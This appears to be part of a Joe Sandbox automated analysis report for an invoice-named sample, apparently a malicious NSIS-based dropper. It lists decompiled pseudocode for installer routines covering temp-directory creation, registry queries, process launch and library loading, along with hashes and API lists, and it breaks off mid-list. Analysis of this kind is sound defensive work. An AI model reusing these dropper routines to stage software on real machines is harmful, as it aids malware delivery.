Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsp1D68.tmp
API String ID: 2655323295-808641140
Opcode ID: da5dd1646f1b3941156e64929c72752a0b3671e5fd854432c304d9b0703b255a
Instruction ID: 065199c4180da03f85bcad36feea8d83242cacde3b0560515a804f641c4ac6e3
Opcode Fuzzy Hash: da5dd1646f1b3941156e64929c72752a0b3671e5fd854432c304d9b0703b255a
Instruction Fuzzy Hash: 21119371E00108BEEB10AFA5DE49EAEBAB4EB54354F11803BF504F71D1DBB84D419B58

Uniqueness

Uniqueness Score: -1.00%

Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402C37(0xfffffff0);
				_t17 = E00405BDB(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405B5D(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E0040580F( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x20)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x20)) == _t28 || E0040582C(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405792( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x24)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040625F(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Musicalises34\\Coleman\\Biarcuated",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}

0x004015c1
0x004015c9
0x004015cc
0x004015d1
0x004015d5
0x004015d7
0x004015df
0x004015e1
0x004015e4
0x004015ea
0x00401604
0x00401607
0x004015ec
0x004015ec
0x004015ef
0x00000000
0x004015fa
0x004015fd
0x004015fd
0x004015ef
0x0040160e
0x00401615
0x00401624
0x00401624
0x00401617
0x0040161a
0x00401622
0x00000000
0x00000000
0x00401622
0x00401615
0x00401627
0x0040162b
0x0040162c
0x004015d7
0x00401634
0x00401663
0x00402245
0x00401636
0x00401638
0x00401645
0x0040164d
0x00401655
0x0040165b
0x0040165b
0x00401655
0x00402ac2
0x00402ace

APIs

Part of subcall function 00405BDB: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,?,00405C4F,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,?,?,76F93420,0040598D,?,C:\Users\user\AppData\Local\Temp\,76F93420,00000000), ref: 00405BE9
Part of subcall function 00405BDB: CharNextW.USER32(00000000), ref: 00405BEE
Part of subcall function 00405BDB: CharNextW.USER32(00000000), ref: 00405C06

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 00405792: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057D5

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated,?,00000000,000000F0), ref: 0040164D

Strings

C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated, xrefs: 00401640

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated
API String ID: 1892508949-3781222300
Opcode ID: cfaf144a50c9d872fad7681be613026781b9e36b6b2873b11358c1c1ca949dd0
Instruction ID: a664f1efeb726e69a6ab8af553608a028f51c0b4cf1c5e7724f5d8b0eae84205
Opcode Fuzzy Hash: cfaf144a50c9d872fad7681be613026781b9e36b6b2873b11358c1c1ca949dd0
Instruction Fuzzy Hash: 9311BE31504504EBCF317FA0CD4159F36A0EF15368B28493BEA45B22F2DB3E4D519A5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040612D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040612D(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t21 = E004060CC(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8); // executed
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x0040613b
0x0040613d
0x00406155
0x0040615a
0x0040615f
0x0040619d
0x0040619d
0x00406161
0x00406173
0x0040617e
0x00406184
0x0040618f
0x00000000
0x00000000
0x0040618f
0x004061a3

APIs

RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,007A0F00,00000000,?,?,Call,?,?,004063A1,80000002), ref: 00406173
RegCloseKey.ADVAPI32(?,?,004063A1,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,007A0F00), ref: 0040617E

Strings

Call, xrefs: 00406134

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
Instruction ID: 844fa4e459781eb8e351c6656b051d01f86af1f9d8b6039d3a5e8c643dc5dfc4
Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
Instruction Fuzzy Hash: E1015A72500209EAEF218F51CD0AEDB3BA8EF54360F01803AF91AA6191D778D964CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405844 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405844(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x7a4f28->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x7a4f28,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x0040584d
0x0040586d
0x00405875
0x0040587a
0x00000000
0x00405880
0x00405884

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F28,Error launching installer), ref: 0040586D
CloseHandle.KERNEL32(?), ref: 0040587A

Strings

Error launching installer, xrefs: 00405857

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
Instruction ID: aeed2aac7dae16331184000a6a76f50175ec0d5b09d6907c0601aa480b830b3a
Opcode Fuzzy Hash: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
Instruction Fuzzy Hash: A0E0BFF5500209BFEB009F64ED05E7B76ACEB54645F018525BD50F2190D67999148A78

Uniqueness

Uniqueness Score: -1.00%

Function 0040202C Relevance: 4.6, APIs: 3, Instructions: 73
libraryCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E0040202C(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				void* _t32;
				void* _t34;
				WCHAR* _t37;
				intOrPtr* _t38;
				void* _t39;

				_t32 = __ebx;
				asm("sbb eax, 0x7a8af8");
				 *(_t39 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x7a8ac8 =  *0x7a8ac8 +  *(_t39 - 4);
					return 0;
				}
				_t37 = E00402C37(0xfffffff0);
				 *((intOrPtr*)(_t39 - 0x3c)) = E00402C37("true");
				if( *((intOrPtr*)(_t39 - 0x18)) == __ebx) {
					L3:
					_t23 = LoadLibraryExW(_t37, _t32, 8); // executed
					 *(_t39 + 8) = _t23;
					if(_t23 == _t32) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t38 = E004066A8( *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x3c)));
					if(_t38 == _t32) {
						E004052C3(0xfffffff7,  *((intOrPtr*)(_t39 - 0x3c)));
					} else {
						 *(_t39 - 4) = _t32;
						if( *((intOrPtr*)(_t39 - 0x20)) == _t32) {
							 *_t38( *((intOrPtr*)(_t39 - 8)), 0x400, _t34, 0x40cdac, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t39 - 0x20)));
							if( *_t38() != 0) {
								 *(_t39 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 - 0x1c)) == _t32 && E0040390D( *(_t39 + 8)) != 0) {
						FreeLibrary( *(_t39 + 8)); // executed
					}
					goto L16;
				}
				_t31 = GetModuleHandleW(_t37); // executed
				 *(_t39 + 8) = _t31;
				if(_t31 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x0040202c
0x0040202c
0x00402031
0x00402038
0x004020f7
0x00402245
0x00402245
0x00402abf
0x00402ac2
0x00402ace
0x00402ace
0x00402047
0x00402051
0x00402054
0x00402064
0x00402068
0x00402070
0x00402073
0x004020f0
0x00000000
0x004020f0
0x00402075
0x00402080
0x00402084
0x004020c4
0x00402086
0x00402089
0x0040208c
0x004020b8
0x0040208e
0x00402091
0x0040209a
0x0040209c
0x0040209c
0x0040209a
0x0040208c
0x004020cc
0x004020e5
0x004020e5
0x00000000
0x004020cc
0x00402057
0x0040205f
0x00402062
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 00402057

Part of subcall function 004052C3: lstrlenW.KERNEL32(007A0F00,00000000,007924D8,76F923A0,?,?,?,?,?,?,?,?,?,0040323B,00000000,?), ref: 004052FB
Part of subcall function 004052C3: lstrlenW.KERNEL32(0040323B,007A0F00,00000000,007924D8,76F923A0,?,?,?,?,?,?,?,?,?,0040323B,00000000), ref: 0040530B
Part of subcall function 004052C3: lstrcatW.KERNEL32(007A0F00,0040323B), ref: 0040531E
Part of subcall function 004052C3: SetWindowTextW.USER32(007A0F00,007A0F00), ref: 00405330
Part of subcall function 004052C3: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405356
Part of subcall function 004052C3: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405370
Part of subcall function 004052C3: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040537E

LoadLibraryExW.KERNELBASE(00000000,?,00000008,?,000000F0), ref: 00402068
FreeLibrary.KERNELBASE(?,?,000000F7,?,?,?,?,00000008,?,000000F0), ref: 004020E5

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: 7ec08670c164e3e4a84eae5e80db5c7481304a47723853e255a05842b85f3cdd
Instruction ID: 33d9dd4ae41202a81bff1c9b27653e69474f3e4813fbbe5d8a50aab7b73a9ae0
Opcode Fuzzy Hash: 7ec08670c164e3e4a84eae5e80db5c7481304a47723853e255a05842b85f3cdd
Instruction Fuzzy Hash: 1E21B371900208AACF20AFA5CE4CA9E7970AF05354F64813BF511B11E1DBBD4951DA5E

Uniqueness

Uniqueness Score: -1.00%

Function 00401B71 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72
memoryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401B71(void* __ebx) {
				intOrPtr _t8;
				void* _t9;
				void _t12;
				void* _t14;
				void* _t22;
				void* _t25;
				void* _t30;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t37;

				_t28 = __ebx;
				_t8 =  *((intOrPtr*)(_t37 - 0x20));
				_t30 =  *0x40cdac; // 0xba3290
				if(_t8 == __ebx) {
					if( *((intOrPtr*)(_t37 - 0x24)) == __ebx) {
						_t9 = GlobalAlloc(0x40, 0x804); // executed
						_t34 = _t9;
						E00406281(__ebx, _t30, _t34, _t34 + 4,  *((intOrPtr*)(_t37 - 0x28)));
						_t12 =  *0x40cdac; // 0xba3290
						 *_t34 = _t12;
						 *0x40cdac = _t34;
					} else {
						if(_t30 == __ebx) {
							 *((intOrPtr*)(_t37 - 4)) = 1;
						} else {
							_t3 = _t30 + 4; // 0xba3294
							E0040625F(_t33, _t3);
							_push(_t30);
							 *0x40cdac =  *_t30;
							GlobalFree();
						}
					}
					goto L15;
				} else {
					while(1) {
						_t8 = _t8 - 1;
						if(_t30 == _t28) {
							break;
						}
						_t30 =  *_t30;
						if(_t8 != _t28) {
							continue;
						} else {
							if(_t30 == _t28) {
								break;
							} else {
								_t32 = _t30 + 4;
								_t36 = L"Call";
								E0040625F(_t36, _t30 + 4);
								_t22 =  *0x40cdac; // 0xba3290
								E0040625F(_t32, _t22 + 4);
								_t25 =  *0x40cdac; // 0xba3290
								_push(_t36);
								_push(_t25 + 4);
								E0040625F();
								L15:
								 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t37 - 4));
								_t14 = 0;
							}
						}
						goto L17;
					}
					_push(0x200010);
					_push(E00406281(_t28, _t30, _t33, _t28, 0xffffffe8));
					E004058C1();
					_t14 = 0x7fffffff;
				}
				L17:
				return _t14;
			}

0x00401b71
0x00401b71
0x00401b74
0x00401b7c
0x00401bc5
0x00401bf3
0x00401bfc
0x00401c02
0x00401c07
0x00401c0c
0x00401c0e
0x00401bc7
0x00401bc9
0x00402885
0x00401bcf
0x00401bcf
0x00401bd4
0x00401bdb
0x00401bdc
0x00401be1
0x00401be1
0x00401bc9
0x00000000
0x00401b7e
0x00401b7e
0x00401b7e
0x00401b81
0x00000000
0x00000000
0x00401b87
0x00401b8b
0x00000000
0x00401b8d
0x00401b8f
0x00000000
0x00401b95
0x00401b95
0x00401b98
0x00401b9f
0x00401ba4
0x00401bae
0x00401bb3
0x00401bb8
0x00401bbc
0x004029db
0x00402abf
0x00402ac2
0x00402ac8
0x00402ac8
0x00401b8f
0x00000000
0x00401b8b
0x004022de
0x004022eb
0x004022ec
0x004022f1
0x004022f1
0x00402aca
0x00402ace

APIs

GlobalFree.KERNEL32(00BA3290), ref: 00401BE1
GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF3

Strings

Call, xrefs: 00401B98, 00401B9E, 00401BB8

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: Global$AllocFree
String ID: Call
API String ID: 3394109436-1824292864
Opcode ID: 1bbcc836f2a4653b13522cd00a863f9842cd1eaa2e08dbca4416ed67f050c7c0
Instruction ID: ff4179f111cc43373cd76ec1a10ab0793b80b0baf7d628909b63b00cde6b52bc
Opcode Fuzzy Hash: 1bbcc836f2a4653b13522cd00a863f9842cd1eaa2e08dbca4416ed67f050c7c0
Instruction Fuzzy Hash: 5521AC72600100EFDB60FB94CE8895A76BAAF94328725413BF502F72D2DA7C98518F1D

Uniqueness

Uniqueness Score: -1.00%

Function 004024F2 Relevance: 4.5, APIs: 3, Instructions: 47
registryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E004024F2(int* __ebx, intOrPtr __edx, short* __esi) {
				void* _t9;
				int _t10;
				long _t13;
				int* _t16;
				intOrPtr _t21;
				void* _t22;
				short* _t24;
				void* _t26;
				void* _t29;

				_t24 = __esi;
				_t21 = __edx;
				_t16 = __ebx;
				_t9 = E00402C77(_t29, 0x20019); // executed
				_t22 = _t9;
				_t10 = E00402C15(3);
				 *((intOrPtr*)(_t26 - 0x4c)) = _t21;
				 *__esi = __ebx;
				if(_t22 == __ebx) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				} else {
					 *(_t26 + 8) = 0x3ff;
					if( *((intOrPtr*)(_t26 - 0x18)) == __ebx) {
						_t13 = RegEnumValueW(_t22, _t10, __esi, _t26 + 8, __ebx, __ebx, __ebx, __ebx);
						__eflags = _t13;
						if(_t13 != 0) {
							 *((intOrPtr*)(_t26 - 4)) = 1;
						}
					} else {
						RegEnumKeyW(_t22, _t10, __esi, 0x3ff);
					}
					_t24[0x3ff] = _t16;
					_push(_t22); // executed
					RegCloseKey(); // executed
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}

0x004024f2
0x004024f2
0x004024f2
0x004024f7
0x004024fe
0x00402500
0x00402508
0x0040250b
0x0040250e
0x00402885
0x00402514
0x0040251c
0x0040251f
0x00402538
0x0040253e
0x00402540
0x00402542
0x00402542
0x00402521
0x00402525
0x00402525
0x00402549
0x00402550
0x00402551
0x00402551
0x00402ac2
0x00402ace

APIs

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402525
RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00020019), ref: 00402538
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402551

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
